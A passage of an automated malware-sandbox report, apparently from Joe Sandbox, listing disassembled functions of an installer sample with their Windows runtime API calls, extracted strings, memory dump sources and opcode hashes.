                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000,?,?,?,?,00000000,?), ref: 6CA84974
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _free$ErrorFileLast
                        • String ID: 8Q
                        • API String ID: 1547350101-4022487301
                        • Opcode ID: 68b92373f13a2df6e65a5876fd3e9bbec60769e3934171dc497252a333f80af9
                        • Instruction ID: 8d732a8a2ec5589352735e3b9f7b31943e476f353f7aee8e6ad0a18bbc0d94a9
                        • Opcode Fuzzy Hash: 68b92373f13a2df6e65a5876fd3e9bbec60769e3934171dc497252a333f80af9
                        • Instruction Fuzzy Hash: A3411736A022459BDB219FF9CD54BCE7B7DAF45328F290211E424A7B90DB34C4CD8765
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CABC41D
                          • Part of subcall function 6CABCE40: __EH_prolog.LIBCMT ref: 6CABCE45
                          • Part of subcall function 6CABC8EB: __EH_prolog.LIBCMT ref: 6CABC8F0
                          • Part of subcall function 6CABC593: __EH_prolog.LIBCMT ref: 6CABC598
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: &qB$0aJ$A0$XqB
                        • API String ID: 3519838083-1326096578
                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                        • Instruction ID: ef39258fd115e93d06a637f950606b7b9b0bd14ddf34d308d8273d1a9c75dee8
                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                        • Instruction Fuzzy Hash: 51217771D01258EECF09DBE4DA859EDBBF4AF25308F20406AE41677781DB781A8CCB21
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: J$0J$DJ$`J
                        • API String ID: 3519838083-2453737217
                        • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                        • Instruction ID: eb4d603d84d5015b9067a732de398528e2a619cc17636336d2219022b7cfa4c7
                        • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                        • Instruction Fuzzy Hash: 6511E0B0900B64CEC720DF5AC55059AFBE8BFA5708B00C90FC0AA97B10C7F8A548CB59
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA6DFD4,00000000,?,6CA6E055,6CA68A69,00000003,00000000), ref: 6CA6DF5F
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA6DF72
                        • FreeLibrary.KERNEL32(00000000,?,?,6CA6DFD4,00000000,?,6CA6E055,6CA68A69,00000003,00000000), ref: 6CA6DF95
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 2cb62df17aafef443a8ffcb1c2f4f96b80a3d0961c4493707a5dc48b98663e13
                        • Instruction ID: 3153e907eae70aeedc693e0b3a78a09fa63890f82ba22c1b2a9270ac82d90f06
                        • Opcode Fuzzy Hash: 2cb62df17aafef443a8ffcb1c2f4f96b80a3d0961c4493707a5dc48b98663e13
                        • Instruction Fuzzy Hash: B9F08230A1521AFBDF059F51C80AB9D7A78EB05799F204560F401F6450CF308E41DB91
                        APIs
                        • __EH_prolog3.LIBCMT ref: 6CA6614E
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CA66159
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA661C7
                          • Part of subcall function 6CA66050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA66068
                        • std::locale::_Setgloballocale.LIBCPMT ref: 6CA66174
                        • _Yarn.LIBCPMT ref: 6CA6618A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                        • String ID:
                        • API String ID: 1088826258-0
                        • Opcode ID: d072339bcd277cd6ef8c720cab69da96fd0232015c408fb829bdcb32b776517f
                        • Instruction ID: 0c6410883baced61d2e076cc02193028f058eb28d76fbe872190b0c0dde1c969
                        • Opcode Fuzzy Hash: d072339bcd277cd6ef8c720cab69da96fd0232015c408fb829bdcb32b776517f
                        • Instruction Fuzzy Hash: 80017175A005219BDB05DF22C958ABC7771FF95654B140009D81197BC1CF346E8ACB81
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $!$@
                        • API String ID: 3519838083-2517134481
                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                        • Instruction ID: c27fefc8e3459725fd6b1eb119a983f06a63c596101aeba6b74df17b314250db
                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                        • Instruction Fuzzy Hash: BE129E74D0124ADFCF04CFE4D590ADDBBB5BF48308F188469E446ABB51DB31A985DBA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog__aulldiv
                        • String ID: $SJ
                        • API String ID: 4125985754-3948962906
                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                        • Instruction ID: 5def515c8d2aa2782c830cc7db0ada387a4149c4f434e0860320fbd8eb51906a
                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                        • Instruction Fuzzy Hash: 31B15FB1D00249DFCB14CFA9CA809AEBBB5FF48314F24852EE459B7B50D735AA85CB50
                        APIs
                          • Part of subcall function 6CA66147: __EH_prolog3.LIBCMT ref: 6CA6614E
                          • Part of subcall function 6CA66147: std::_Lockit::_Lockit.LIBCPMT ref: 6CA66159
                          • Part of subcall function 6CA66147: std::locale::_Setgloballocale.LIBCPMT ref: 6CA66174
                          • Part of subcall function 6CA66147: _Yarn.LIBCPMT ref: 6CA6618A
                          • Part of subcall function 6CA66147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA661C7
                          • Part of subcall function 6C932F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C932F95
                          • Part of subcall function 6C932F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C932FAF
                          • Part of subcall function 6C932F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C932FD0
                          • Part of subcall function 6C932F60: __Getctype.LIBCPMT ref: 6C933084
                          • Part of subcall function 6C932F60: std::_Facet_Register.LIBCPMT ref: 6C93309C
                          • Part of subcall function 6C932F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C9330B7
                        • std::ios_base::_Addstd.LIBCPMT ref: 6C93211B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 3332196525-1866435925
                        • Opcode ID: c48f33715b52f11473773c1912a1bf7a470162c5ca41dc13f9702cadf1c42aa0
                        • Instruction ID: 2763bbdffe896ae145ed5c8785839f8df1ade22b8e337b3905f651624e064b82
                        • Opcode Fuzzy Hash: c48f33715b52f11473773c1912a1bf7a470162c5ca41dc13f9702cadf1c42aa0
                        • Instruction Fuzzy Hash: C741C0B0A017098FDB00CF64C8497AEBBB5FF48314F149268E919AB792E775D985CBD0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $CK$CK
                        • API String ID: 3519838083-2957773085
                        • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                        • Instruction ID: 7703028b9ce02b768911e02b0dd45d447ae3af63e2fab50b48831d2cdef72c6c
                        • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                        • Instruction Fuzzy Hash: 8F21B674E01615CBCB04DFE9D5901EEF7BAFF94304F14462AC422B3B91C7748A869A60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0$LrJ$x
                        • API String ID: 3519838083-658305261
                        • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                        • Instruction ID: b70a1c0e3c6c76a587bdf1f491b8c93d80a40da5130097cec633624de1518e22
                        • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                        • Instruction Fuzzy Hash: 1A215B32D1111D9BCF04CBD8DA91AEDB7F5EF59308F20015AD411B7640DB765E88CBA1
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAC2ECC
                          • Part of subcall function 6CAAD58A: __EH_prolog.LIBCMT ref: 6CAAD58F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: :hJ$dJ$xJ
                        • API String ID: 3519838083-2437443688
                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                        • Instruction ID: 2a9f8a8081b71061ecf733a277eb82901d6154adbc1a01f2e4a27a5835df2505
                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                        • Instruction Fuzzy Hash: 7021DAB0811B40CFC760CF6AC14429ABBF4BF2A708B40C95EC0AA97B11E7B4A64CCF55
                        APIs
                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA79EF0,6C931DEA,00008000,6CA79EF0,?,?,?,6CA79A9F,6CA79EF0,?,00000000,6C931DEA), ref: 6CA79BE9
                        • GetLastError.KERNEL32(?,?,?,6CA79A9F,6CA79EF0,?,00000000,6C931DEA,?,6CA834BE,6CA79EF0,000000FF,000000FF,00000002,00008000,6CA79EF0), ref: 6CA79BF3
                        • __dosmaperr.LIBCMT ref: 6CA79BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer__dosmaperr
                        • String ID: 8Q
                        • API String ID: 2336955059-4022487301
                        • Opcode ID: 8eafa5cd0209333ed80fb8f4de0740d9fdc9d769c14154b5aa734c46a210f02f
                        • Instruction ID: a87a7d4a06ce98c195b5e04960da9dbca62ed55ae541aa33dcd4a9e6fe54addd
                        • Opcode Fuzzy Hash: 8eafa5cd0209333ed80fb8f4de0740d9fdc9d769c14154b5aa734c46a210f02f
                        • Instruction Fuzzy Hash: B9012436720515AFCF098F7ACD8589E7B79FB86334B280209E814DB680EB70D98187A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: <J$DJ$HJ$TJ$]
                        • API String ID: 0-686860805
                        • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                        • Instruction ID: ffd60ce96d58af42f23326fe5953d1544a14514c8d7e7e209c144a54a300e635
                        • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                        • Instruction Fuzzy Hash: 1541B230C15349AFCF14DBB1D6908EEB7B8AF21308B24816AE12177A51EB35A6CDCB51
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv
                        • String ID:
                        • API String ID: 3732870572-0
                        • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                        • Instruction ID: 2f40ed6e8103ec238bd62e8f691b9b5f05d819c35cff4d2cdb8aa83591f51287
                        • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                        • Instruction Fuzzy Hash: 2911B7B62007447FEB254AA4CD44EBFBBBDEFC5744F14881DF14666650C672AC88C760
                        APIs
                        • GetLastError.KERNEL32(00000008,?,00000000,6CA77273), ref: 6CA737D7
                        • _free.LIBCMT ref: 6CA73834
                        • _free.LIBCMT ref: 6CA7386A
                        • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CA73875
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorLast_free
                        • String ID:
                        • API String ID: 2283115069-0
                        • Opcode ID: eef1a93dc1c29023b10eefc1bab6d9e1db6fc0347697cf58b72f1e6e59bdbf70
                        • Instruction ID: e724975c9fa08c98582c6023fdb8e4dcd974fe3fe4a87c3575f452467248c860
                        • Opcode Fuzzy Hash: eef1a93dc1c29023b10eefc1bab6d9e1db6fc0347697cf58b72f1e6e59bdbf70
                        • Instruction Fuzzy Hash: EE11777E3172016E9B655AB58D88AAA2569BBC22BCB2F0724F165C3BD0DF71CC8D4130
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0), ref: 6CA84CF1
                        • GetLastError.KERNEL32(?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0,?,6CA7AB3C,6CA848D6), ref: 6CA84CFD
                          • Part of subcall function 6CA84D4E: CloseHandle.KERNEL32(FFFFFFFE,6CA84D0D,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?,6CA79EF0), ref: 6CA84D5E
                        • ___initconout.LIBCMT ref: 6CA84D0D
                          • Part of subcall function 6CA84D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA84CCB,6CA8395E,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D42
                        • WriteConsoleW.KERNEL32(00000000,?,6CA8350C,00000000,?,6CA83971,00000000,00000001,00000000,6CA79EF0,?,6CA7B0A6,?,?,6CA79EF0,?), ref: 6CA84D22
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: be77d68f80428d8976cb147fa481194b7760a01ff87378deb0835947818a8b47
                        • Instruction ID: 17a7c3cbdcead5d15952b0d538ee1cc19c8491fad842962bd677c8555b10f94b
                        • Opcode Fuzzy Hash: be77d68f80428d8976cb147fa481194b7760a01ff87378deb0835947818a8b47
                        • Instruction Fuzzy Hash: 9EF03736511229BBCF121F91CC09D893F3AFF0A7A6B084510F90886224DB72D865DB90
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CA9C077
                          • Part of subcall function 6CA9BFF5: __EH_prolog.LIBCMT ref: 6CA9BFFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: :$\
                        • API String ID: 3519838083-1166558509
                        • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                        • Instruction ID: bccc6512fef62ab74747654f256d6d9f5792fd707d1593d171fcb825fe3fdf2c
                        • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                        • Instruction Fuzzy Hash: 9CE10530920A099ACF10EFA8C696BEEB7F1BF0531CF144219D456ABAD0DB71A5CDCB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog__aullrem
                        • String ID: d%K
                        • API String ID: 3415659256-3110269457
                        • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                        • Instruction ID: 73467d28694270e5bc99504cd0f6dc6e2741ba1960d3d0d8ad1a0e66eff3121d
                        • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                        • Instruction Fuzzy Hash: 7381AE71A002099FDF01CF98C990BDEB7F5EF49348F28805AE858AB641D771D989DBE1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID: 8Q
                        • API String ID: 2427045233-4022487301
                        • Opcode ID: ab176a573855c22d01f36f7e839ea78fcf500f84f40be29ceb791267b68f1117
                        • Instruction ID: 365bff15871a56d571819911ff5db83950cdb9e91a6f41ceffa719d82508971d
